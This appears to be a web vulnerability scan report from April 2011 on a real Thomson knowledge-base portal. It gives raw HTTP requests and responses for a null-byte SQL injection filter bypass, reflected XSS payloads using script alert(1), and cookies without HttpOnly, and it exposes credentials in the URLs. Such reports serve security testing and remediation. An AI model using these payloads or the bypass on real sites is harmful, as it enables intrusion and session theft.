Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; c_m2=1; c=undefined572000undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=49; s_cc=true; s_sq=; IWICategory=IWICategory=21

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:38:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6551

<html>
<head>
<title>ERROR [42S22] [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name 'Lan_code'.</title>
<style>
   body {font-family:"Verdana";font-weig
...[SNIP]...

1.9. http://kbportal.thomson.com/index.aspx [cpc parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /index.aspx

Issue detail

The cpc parameter appears to be vulnerable to SQL injection attacks. The payload %00' was submitted in the cpc parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /index.aspx?t=&article=&c=12&cid=21&cpc=mCUbki05i2q2gM801Slr08SHaX285EO45%00'&cat=&catURL= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; c_m2=1; c=undefined572000undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%2C%5B%27Referrers%27%2C%271303849270372%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303849306606%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=49; s_cc=true; s_sq=; IWICategory=IWICategory=21

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 26 Apr 2011 20:39:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 7452

<html>
<head>
<title>ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the character string 'mCUbki05i2q2gM801Slr08SHaX285EO45'.
ERROR [42000] [Microsoft][ODBC SQL Server Driver][SQL Server]Incorrect syntax near 'mCUbki05i2q2gM801Slr08SHaX285EO45'.</title>
...[SNIP]...

2. Cross-site scripting (reflected)  previous  next
There are 3 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://kbportal.thomson.com/display/2/_midframe.aspx [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/_midframe.aspx

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5f5a"><script>alert(1)</script>563f308447c was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/_midframe.aspx?tab=e5f5a"><script>alert(1)</script>563f308447c&aid=&searchstring=&searchtype=&searchby=&alp=&search= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/index.aspx?tab=browse&c=&cpc=&cid=&cat=&catURL=&r=0.8218797
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 573


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<FRAME frameBorder="no" name="frabar" id="frabar" noResize scrolling=no src="midframe_files/_top.aspx?tab=e5f5a"><script>alert(1)</script>563f308447c" style="border-bottom: #003366 1px solid"/>
...[SNIP]...

2.2. http://kbportal.thomson.com/display/2/index.aspx [tab parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/index.aspx

Issue detail

The value of the tab request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a137c"><script>alert(1)</script>2f85ada7e43 was submitted in the tab parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/index.aspx?tab=a137c"><script>alert(1)</script>2f85ada7e43&c=&cpc=&cid=&cat=&catURL=&r=0.8218797 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=21; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:05:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 1020


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>TR Default</
...[SNIP]...
<frame name="fraLeftFrame" BORDERCOLOR=B3B3BA src="_leftframe.aspx?tab=a137c"><script>alert(1)</script>2f85ada7e43&searchstring=&searchtype=&searchby=&cat=&catURL=" FRAMEBORDER="1" BORDER="1"/>
...[SNIP]...

2.3. http://kbportal.thomson.com/display/2/optframe.aspx [opt parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/optframe.aspx

Issue detail

The value of the opt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bec10"><script>alert(1)</script>f83538fe8fc was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /display/2/optframe.aspx?opt=bec10"><script>alert(1)</script>f83538fe8fc HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_midframe.aspx?tab=opt2&aid=&searchstring=&searchtype=&searchby=&alp=&search=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=store%3Asecure%3Aemptybasket; s_sq=%5B%5BB%5D%5D; s_ppv=100; PortalSettings=cpId~88|ClientId~12|DisplayMode~2|AutoComplete~False|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~B3B3BA|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/BuiltIn/Default/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; IWICategory=IWICategory=

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:36:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 366


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<frameset rows="*" border="0"
...[SNIP]...
<frame src="opt.aspx?opt=bec10"><script>alert(1)</script>f83538fe8fc" marginwidth="5" marginheight="5">
...[SNIP]...

3. Cookie without HttpOnly flag set  previous  next
There are 5 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://kbportal.thomson.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://kbportal.thomson.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?cid=21&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&UN=CSO&PW=CSO HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; c_m2=1; c=undefined571422undefined; SC_LINKS=%5B%5BB%5D%5D; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%5D; gpv_pn=support%3Acontact-us%3Adefault; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:04:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
P3P: CP=CAO, PSA, OUR
Location: /display/2/login.aspx?cpid=21&username=CSO&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.426698744297028&searchstring=&searchtype=
Set-Cookie: IWICategory=IWICategory=21; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=pgjffeamcy0qmo55shtmhjrj; path=/
Set-Cookie: LangCode=en-US; expires=Thu, 26-May-2011 20:04:25 GMT; path=/
Set-Cookie: LangId=1; expires=Thu, 26-May-2011 20:04:25 GMT; path=/
Set-Cookie: PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 339
Set-Cookie: BIGipServerKB-80=2240234663.20480.0000; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/display/2/login.aspx?cpid=21&amp;username=CSO&amp;password=CSO&amp;c=12&amp;cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&
...[SNIP]...

3.2. http://kbportal.thomson.com/display/2/index.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/index.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/2/index.aspx?tab=browse&c=&cpc=&cid=&cat=&catURL=&r=0.8218797 HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; IWICategory=IWICategory=21; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_ppv=0; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 20:04:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 975


<!doctype html public "-//w3c//dtd xhtml 1.0 transitional//en" "http://www.w3.org/tr/xhtml1/dtd/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>West Researc
...[SNIP]...

3.3. http://kbportal.thomson.com/display/2/kb/cat.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/kb/cat.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /display/2/kb/cat.aspx?cid= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://kbportal.thomson.com/display/2/_leftframe.aspx?tab=browse&searchstring=&searchtype=&searchby=&cat=&catURL=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c=undefined571419undefined; s_ev48=%5B%5B%27Direct%2520Load%27%2C%271303848189235%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848211712%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848222394%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274123%27%5D%2C%5B%27Paid%2520Non-Search%27%2C%271303848274825%27%5D%5D; ASP.NET_SessionId=ifehguqr5ssjx1e2zfvbeq3b; LangCode=en-US; LangId=1; PortalSettings=cpId~21|ClientId~12|DisplayMode~2|AutoComplete~True|language~English|BackgroundColor~ffffff|HotBoxBackgroundColor~f7f7f7|HotBoxTextColor~333333|TextColor~333333|HotBoxCornerRadius~10|HotBoxBorder~F|HotBoxBorderColor~999999|TabBarBackgroundColor~eeeef4|PageHeaderBackgroundColor~f3f3ff|TabBodyMarginTop~0|TabBodyMarginBottom~10|TabBodyMarginLeft~10|BrowserOptions~IE6:MSIE.6|FF:Firefox,Chrome,Netscape|Safari:Safari|CenterWindowContents~F|WindowTopMargin~10|WindowBottomMargin~10|WindowLeftMargin~10|WindowRightMargin~10|SideBarTopMargin~10|SideBarBottomMargin~10|SideBarRightMargin~10|SideBarLeftMargin~10|StyleSheet~/al/css/12/20/styles_ff.css|DayNamesAbbrev~Sun,Mon,Tue,Wed,Thu,Fri,Sat|MonthNames~January,February,March,April,May,June,July,August,September,October,November,December; BIGipServerKB-80=428295335.20480.0000; s_cc=true; c_m2=1; SC_LINKS=%5B%5BB%5D%5D; gpv_pn=Shipping%20Information; s_sq=%5B%5BB%5D%5D; s_ppv=100; IWICategory=IWICategory=

Response

HTTP/1.1 302 Found
Date: Tue, 26 Apr 2011 20:05:11 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Location: /pc/12/categoryList/21/2/cat_index.html?r=0.2640597
Set-Cookie: IWICategory=IWICategory=; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Content-Length: 168

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href='/pc/12/categoryList/21/2/cat_index.html?r=0.2640597'>here</a>.</h2>
</body></html>

3.4. http://kbportal.thomson.com/display/2/login.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kbportal.thomson.com
Path:   /display/2/login.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /display/2/login.aspx?cpid=21&username=CSO&password=CSO&c=12&cpc=0mrUqKX3giwpVgd1Sd3l2bPAxyohnwt7D70&cid=21&t=&aid=&cat=&catURL=&r=0.754933476448059&searchstring=&searchtype= HTTP/1.1
Host: kbportal.thomson.com
Proxy-Connection: keep-alive
Referer: http://west.thomson.com/support/contact-us/default.aspx?PromCode=571422&FindingMethod=Navigation
